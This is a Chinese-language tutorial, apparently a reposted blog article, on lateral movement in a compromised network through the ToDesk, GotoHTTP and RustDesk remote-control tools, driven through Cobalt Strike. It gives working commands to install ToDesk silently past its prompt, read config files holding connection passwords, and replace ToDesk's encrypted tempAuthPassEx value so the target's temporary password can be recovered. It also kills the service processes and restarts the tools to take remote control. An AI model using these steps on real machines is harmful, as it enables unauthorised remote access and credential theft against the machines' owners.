目录
关于向日葵的声名:
向日葵官方已经禁止有漏洞的版本连接服务器,所以这个向日葵横向已经失效,在这里就不多赘述了。
利用ToDesk横向移动:
ToDesk介绍:
ToDesk是一款类似向日葵
的远程控制软件,但比向日葵、TV和AD更为流畅和稳定,它同样具备着内网穿透、文件 传输、云端同步和流量加密等功能 有绿色精简版和全功能版两个版本,支持的系统有:Winodws/Linux/MacOS/Android/iOS
环境准备:
本机:windows10 靶机:server 2019
本机软件准备:cobaltstrike 、ToDesk 靶机软件准备:ToDesk
使用方法:
1.绕过首次安装弹窗
当我们首次打开todesk软件,必然会出现一个弹窗,如下图所示:
我们可以使用如下指令进行绕过:
cs: shell ToDesk1.exe /S //官方给的静默安装,可以到达绕过的效果
2.安装完成后自动运行,接下来查看配置文件
在 C:"Program Files (x86)"\ToDesk\ 的路径下会有一个config.ini文件,这个文件里面有着连接ToDesk的临时密码。我们使用如下指令进行查看:
cs: shell type C:\"Program Files (x86)"\ToDesk\config.ini
注意:tempAuthPassEx里面的临时密码是经过加密的,可以进行解密,但不建议(会需要很长的时间)下面介绍一个更简单的方法。
3.解决tempAuthPassEx加密的问题:
1.在自己的机器上也安装一个Todesk软件
2.在本机上找到C:"Program Files (x86)"\ToDesk\config.ini 的文件
并将它的临时密码记录下来。
再将自己的tempAuthPassEx替换到靶机上的tempAuthPassEx,就可以知道靶机上的临时密码了。
步骤一:
把靶机的tempAuthPassEx替换成自己的tempAuthPassEx,这点很重要。在使用cs中的File Browse进行文件的替换
在对比一下tempAuthPassEx是否被换掉:
shell type C:\"Program Files (x86)"\ToDesk\config.ini
步骤三:重启ToDesk即可
查找进程:
shell tasklist
删除ToDesk_Service.exe和ToDesk_Service.exe进程:
shell taskkill /pid 6696 /F
shell taskkill /pid 7764 /F
重启ToDesk:
shell C:\"Program Files (x86)"\ToDesk\ToDesk.exe
使用本机的临时密码登录即可。设备代码可以通过cs自带的VNC进行查看。
GoToHTTP横向移动:
介绍:
GotoHTTP工作在B2C模式。使用远程控制时,不必在每一台电脑上都安装远程软件。不管身处何处,有浏览器就能访问远程电脑。 即使公司网络管控,仍然可以控制或被控制。支持文件传输、无人值守、剪切板同步、远程语音、远程摄像头、多显示器支持
下载地址:GotoHTTP - Free Download
使用方法:
前提条件:
使用cs或者其他文件上传的工具,将exe文件上传到目标机器。
1.运行exe文件
命令:
shell dir C:\Users\Administrator\Desktop\GotoHTTP_x64
它会在该目录下生成一个gotohttp.ini的配置文件
2.查看gotohttp.ini配置文件
命令:
shell type C:\Users\Administrator\Desktop\gotohttp.ini
可以看到文件中的连接地址、账号、密码
3.使用浏览器进行连接:
GotoHTTP - 在线远程控制平台
注意:现在是需要付费的
利用RustDESK横向移动:
介绍:
远程桌面软件,开箱即用,无需要任何配置,完美替代了TeamViewer。可以完全掌控数据,不用担心安全的问题。
下载地址:
rustdesk: 远程桌面软件 (gitee.com)
使用方法:
前提:
使用cs或者其他文件上传的工具,将exe文件上传到目标机器。
1.运行该程序
cs:shell rustdesk.exe //注意路径
2.找到config配置文件
该文件位置在:C:\Users\Administrator\AppData\Roaming\RustDesk\config
命令:
shell dir C:\Users\Administrator\AppData\Roaming\RustDesk\config
3.查看文件:
命令:
shell type C:\Users\Administrator\AppData\Roaming\RustDesk\config\RustDesk.toml
但需要注意:第一次运行rustdesk是没有密码的
4.创建文件进行替换。该方法和ToDesk相似,可以进行参考
5.上传文件:
使用cs的File Browser进行替换
检查文件是否被更改:
命令:
shell type C:\Users\Administrator\AppData\Roaming\RustDesk\config\RustDesk.toml
发现该文件的密码确实已被更改。
记住该文件中的id和password
6.重启rustdesk
查看进程:
shell tasklist
杀掉该进程:
shell taskkill /pid 7984 /F
再次启动restdesk程序:
shell rustdesk.exe //注意路径
最后在本地进行连接即可
版权归原作者 RLG_星辰 所有, 如有侵权,请联系我们删除。